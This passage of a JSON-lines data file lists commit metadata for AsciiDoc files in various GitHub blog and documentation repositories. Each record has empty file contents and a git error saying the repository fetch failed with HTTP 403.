mso4sc\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-fud5-day4.adoc","new_file":"_posts\/2017-09-01-fud5-day4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b402576c124196b7302ea71ad184de704345d91","subject":"Update 2016-12-03-NCC-Group-Internship.adoc","message":"Update 2016-12-03-NCC-Group-Internship.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-03-NCC-Group-Internship.adoc","new_file":"_posts\/2016-12-03-NCC-Group-Internship.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c6ef3238f5a6abeb2913ffb5a4dfaa015b3a061","subject":"add CI github actions","message":"add CI github actions\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"DevOps\/CI-github-actions.adoc","new_file":"DevOps\/CI-github-actions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46a953a38d1a5f03307c0a98e29cf5b81cd49732","subject":"Update 2016-04-16-google-analytics-with-google-apps-script2.adoc","message":"Update 2016-04-16-google-analytics-with-google-apps-script2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script2.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eed269bb312652e6d75007a9be2441d4efa14028","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1f3bd00d81e35b20ec27f3e1ef3ca2cebe9ac67","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a7852db9b8ef1d8d6ea0fb5ddd90b09b991d2c6","subject":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","message":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57df16ed1ee912b5289df326e1b326bb85454a88","subject":"Update 2016-01-06-Introducing-the-New-bGC2-Site.adoc","message":"Update 2016-01-06-Introducing-the-New-bGC2-Site.adoc","repos":"duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse","old_file":"_posts\/2016-01-06-Introducing-the-New-bGC2-Site.adoc","new_file":"_posts\/2016-01-06-Introducing-the-New-bGC2-Site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/duggiemitchell\/JavascriptMuse.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4c1fbc5f34bc120b311282df809b2aaccb5a638","subject":"y2b create post $8 Headphones Vs. $80 Beats Headphones","message":"y2b create post $8 Headphones Vs. $80 Beats Headphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-20-8-Headphones-Vs-80-Beats-Headphones.adoc","new_file":"_posts\/2017-03-20-8-Headphones-Vs-80-Beats-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54a500fef40f5dd9b0137755602969051c50e2a8","subject":"y2b create post The Best 9 Dollars You'll Ever Spend...","message":"y2b create post The Best 9 Dollars You'll Ever Spend...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-11-The-Best-9-Dollars-Youll-Ever-Spend.adoc","new_file":"_posts\/2017-11-11-The-Best-9-Dollars-Youll-Ever-Spend.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf762b611c093d7918debc34755ef3bd9d9346d5","subject":"second step into an asciidoc user guide","message":"second step into an asciidoc user guide\n","repos":"Poundex\/open-dolphin,Poundex\/open-dolphin,canoo\/open-dolphin,nagyistoce\/open-dolphin,canoo\/open-dolphin,Poundex\/open-dolphin,janih\/open-dolphin,janih\/open-dolphin,DaveKriewall\/open-dolphin,nagyistoce\/open-dolphin,nagyistoce\/open-dolphin,Poundex\/open-dolphin,DaveKriewall\/open-dolphin,DaveKriewall\/open-dolphin,nagyistoce\/open-dolphin,janih\/open-dolphin,gemaSantiago\/open-dolphin,canoo\/open-dolphin,janih\/open-dolphin,DaveKriewall\/open-dolphin,gemaSantiago\/open-dolphin,gemaSantiago\/open-dolphin,canoo\/open-dolphin,gemaSantiago\/open-dolphin","old_file":"subprojects\/documentation\/src\/docs\/asciidoc\/OpenDolphin.adoc","new_file":"subprojects\/documentation\/src\/docs\/asciidoc\/OpenDolphin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/janih\/open-dolphin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b0a83bc8b4f52ec315ab232415368a602deeaf87","subject":"Update 2016-05-17-Hbase.adoc","message":"Update 2016-05-17-Hbase.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2016-05-17-Hbase.adoc","new_file":"_posts\/2016-05-17-Hbase.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"757e4726fd97850df806134011c37e46d7c61d15","subject":"Update 2017-07-28-mecab.adoc","message":"Update 2017-07-28-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-mecab.adoc","new_file":"_posts\/2017-07-28-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a3ef906d79caad345361ebb6d717039b01b912e","subject":"systemd configuration examples","message":"systemd configuration examples\n\nSigned-off-by: Thomas Sj\u00f6gren <9ff28d1cb1d19283ed3327b40df6c7d62d8bc343@users.noreply.github.com>\n","repos":"konstruktoid\/hardening,konstruktoid\/hardening","old_file":"systemd.adoc","new_file":"systemd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/konstruktoid\/hardening.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d06c6177dc13c4e31440b65288f4fdbf299ca1be","subject":"Update 2018-07-03-vr-lt.adoc","message":"Update 2018-07-03-vr-lt.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-03-vr-lt.adoc","new_file":"_posts\/2018-07-03-vr-lt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06957adc6552f3c150a884a116cb9aec49fbac78","subject":"Update 2013-03-02-Eclipse-Juno-SR2-peut-etre-enfin-une-version-rapide.adoc","message":"Update 2013-03-02-Eclipse-Juno-SR2-peut-etre-enfin-une-version-rapide.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-03-02-Eclipse-Juno-SR2-peut-etre-enfin-une-version-rapide.adoc","new_file":"_posts\/2013-03-02-Eclipse-Juno-SR2-peut-etre-enfin-une-version-rapide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a081167a831de7e617cea18541174561989da14e","subject":"Update 2017-10-08-Acemice-Belki-Hadsizce-8.adoc","message":"Update 2017-10-08-Acemice-Belki-Hadsizce-8.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-10-08-Acemice-Belki-Hadsizce-8.adoc","new_file":"_posts\/2017-10-08-Acemice-Belki-Hadsizce-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c032c3fea5c39ac40c1757f70a404e077d96118d","subject":"y2b create post Google Pixel 2 and Pixel 2 XL Hands On!","message":"y2b create post Google Pixel 2 and Pixel 2 XL Hands On!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-04-Google-Pixel-2-and-Pixel-2-XL-Hands-On.adoc","new_file":"_posts\/2017-10-04-Google-Pixel-2-and-Pixel-2-XL-Hands-On.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"723f18a31fd616501405524bbdcf932f4b8bac5d","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0f3712a7b35cfb71fe0618d0dd6fe899af5f665","subject":"Update 2018-10-05-E-K-S.adoc","message":"Update 2018-10-05-E-K-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-05-E-K-S.adoc","new_file":"_posts\/2018-10-05-E-K-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ffa72b226bb9aa34a87ee298c81a38a8daa4982","subject":"add CHANGELOG; populate with changes from all past releases","message":"add CHANGELOG; populate with changes from all past releases\n","repos":"asciidoctor\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mojavelinux\/asciidoctor-pdf.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41dd906f05ff91f2a6eaa63ab1bf950d8ec71063","subject":"Update 2015-11-03-rickshaw.adoc","message":"Update 2015-11-03-rickshaw.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-11-03-rickshaw.adoc","new_file":"_posts\/2015-11-03-rickshaw.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc9db3655cd1e5f1479e7afcbb25dd8e0175b631","subject":"Add documentation for `will_return_by_value`","message":"Add documentation for `will_return_by_value`\n\nAdded documentation with example\n","repos":"cgreen-devs\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen","old_file":"doc\/cgreen-guide-en.asciidoc","new_file":"doc\/cgreen-guide-en.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cgreen-devs\/cgreen.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"efac122338e0f216923d0272d92a6ce7507109e8","subject":"Sect curl","message":"Sect curl\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"WS client.adoc","new_file":"WS client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29db2c1c129c07094dbddc24aad130d245bd71bb","subject":"adding MYSQL_ROOT_PASSWORD explanation","message":"adding MYSQL_ROOT_PASSWORD explanation\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d966abc3c077f2b91763d647478c966e19ea29e8","subject":"Apply the reviews.","message":"Apply the reviews.\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/Getting Started.asciidoc","new_file":"docs\/src\/main\/asciidoc\/Getting Started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"52fb3c1b9cd35a285929ae51694753db2f3f9951","subject":"docs: devel: fix link","message":"docs: devel: fix link\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/devel\/design.adoc","new_file":"docs\/devel\/design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"685304a8250fea226fa100d70e432e50badc48b4","subject":"Update 2015-08-23-Continuous-Delivery-with-Jenkins-workflow-and-Docker.adoc","message":"Update 2015-08-23-Continuous-Delivery-with-Jenkins-workflow-and-Docker.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2015-08-23-Continuous-Delivery-with-Jenkins-workflow-and-Docker.adoc","new_file":"_posts\/2015-08-23-Continuous-Delivery-with-Jenkins-workflow-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58876d25409a19ec553992b45a80f9bb02239b15","subject":"docs updated","message":"docs updated\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59b1d91848b1904a857cf58be357b1e89f195a52","subject":"y2b create post New 13\\","message":"y2b create post New 13\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-10-26-New-13.adoc","new_file":"_posts\/2012-10-26-New-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99df5d44ce39c321d9637566a424d4c8e233d27a","subject":"Update 2016-11-06-Sunday.adoc","message":"Update 2016-11-06-Sunday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-06-Sunday.adoc","new_file":"_posts\/2016-11-06-Sunday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b47977b9c66c4a0cbcc0aee8426981626c4bb5d7","subject":"Add CHANGELOG enttr for 2.1.1","message":"Add CHANGELOG enttr for 2.1.1\n","repos":"rumpelsepp\/pynote","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"464d328f104714c4277eed16c3c35dec7d913922","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d22acdf0fc3cd61022919c3f5a6fad37599eddf","subject":"Update 2018-08-27-G-A-S-slack-birthday-channel.adoc","message":"Update 2018-08-27-G-A-S-slack-birthday-channel.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-27-G-A-S-slack-birthday-channel.adoc","new_file":"_posts\/2018-08-27-G-A-S-slack-birthday-channel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5157eae0a40dad08bab21abf5130d6a60dbca8c","subject":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","message":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87b88a91d230c79da35c99fd855e63e8d21d897f","subject":"Update 2016-02-29-Ein-W-P-Projekt-zum-Vorstellen-meiner-Projekte.adoc","message":"Update 2016-02-29-Ein-W-P-Projekt-zum-Vorstellen-meiner-Projekte.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Ein-W-P-Projekt-zum-Vorstellen-meiner-Projekte.adoc","new_file":"_posts\/2016-02-29-Ein-W-P-Projekt-zum-Vorstellen-meiner-Projekte.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74b42e784e790b97d2351b5df6a00f8013865ca4","subject":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85754bee673e751f3dc59ca97ee9d01e8c8ddd7a","subject":"y2b create post 5 Reasons Headphones Are Better Than Earphones","message":"y2b create post 5 Reasons Headphones Are Better Than Earphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-28-5-Reasons-Headphones-Are-Better-Than-Earphones.adoc","new_file":"_posts\/2016-04-28-5-Reasons-Headphones-Are-Better-Than-Earphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da6f8c1b339621b581c650f4f6938f099f6b9977","subject":"y2b create post This New Speaker Will Blow Your Mind (Seriously)","message":"y2b create post This New Speaker Will Blow Your Mind (Seriously)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-17-This-New-Speaker-Will-Blow-Your-Mind-Seriously.adoc","new_file":"_posts\/2017-08-17-This-New-Speaker-Will-Blow-Your-Mind-Seriously.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb13511216d0a9cc06be68f15510ce62b0b354bf","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f228d5c579a765ba0915a7c83529a779086fc35f","subject":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","message":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e46542c8cfda0e27e2231f9b8e566ba0ed1d496","subject":"Update 2015-09-17-Entrada-de-prueba-1.adoc","message":"Update 2015-09-17-Entrada-de-prueba-1.adoc","repos":"jpcanovas\/myBlog,jpcanovas\/myBlog,jpcanovas\/myBlog","old_file":"_posts\/2015-09-17-Entrada-de-prueba-1.adoc","new_file":"_posts\/2015-09-17-Entrada-de-prueba-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jpcanovas\/myBlog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61b20db67b99faefc815d1eeed95eda8f8073530","subject":"Update 2016-02-10-Aaaaas.adoc","message":"Update 2016-02-10-Aaaaas.adoc","repos":"pej\/hubpress.io,pej\/hubpress.io,pej\/hubpress.io,pej\/hubpress.io","old_file":"_posts\/2016-02-10-Aaaaas.adoc","new_file":"_posts\/2016-02-10-Aaaaas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pej\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b85028af073a38508b9c1bdf618aedb99e4cc2d8","subject":"Update 2016-02-10-testje.adoc","message":"Update 2016-02-10-testje.adoc","repos":"roelvs\/roelvs.github.io,roelvs\/roelvs.github.io,roelvs\/roelvs.github.io,roelvs\/roelvs.github.io","old_file":"_posts\/2016-02-10-testje.adoc","new_file":"_posts\/2016-02-10-testje.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roelvs\/roelvs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4468cfbba834259df2fbc0ba9674ffde044af3b8","subject":"Update 2015-05-28-Eclipse-Mars-episode-2-Filtrer-la-popup-Open-Resource.adoc","message":"Update 2015-05-28-Eclipse-Mars-episode-2-Filtrer-la-popup-Open-Resource.adoc","repos":"jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog","old_file":"_posts\/2015-05-28-Eclipse-Mars-episode-2-Filtrer-la-popup-Open-Resource.adoc","new_file":"_posts\/2015-05-28-Eclipse-Mars-episode-2-Filtrer-la-popup-Open-Resource.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabbytechnologies\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11e57784d2cd3c124166a70cd222e9dabcd08623","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 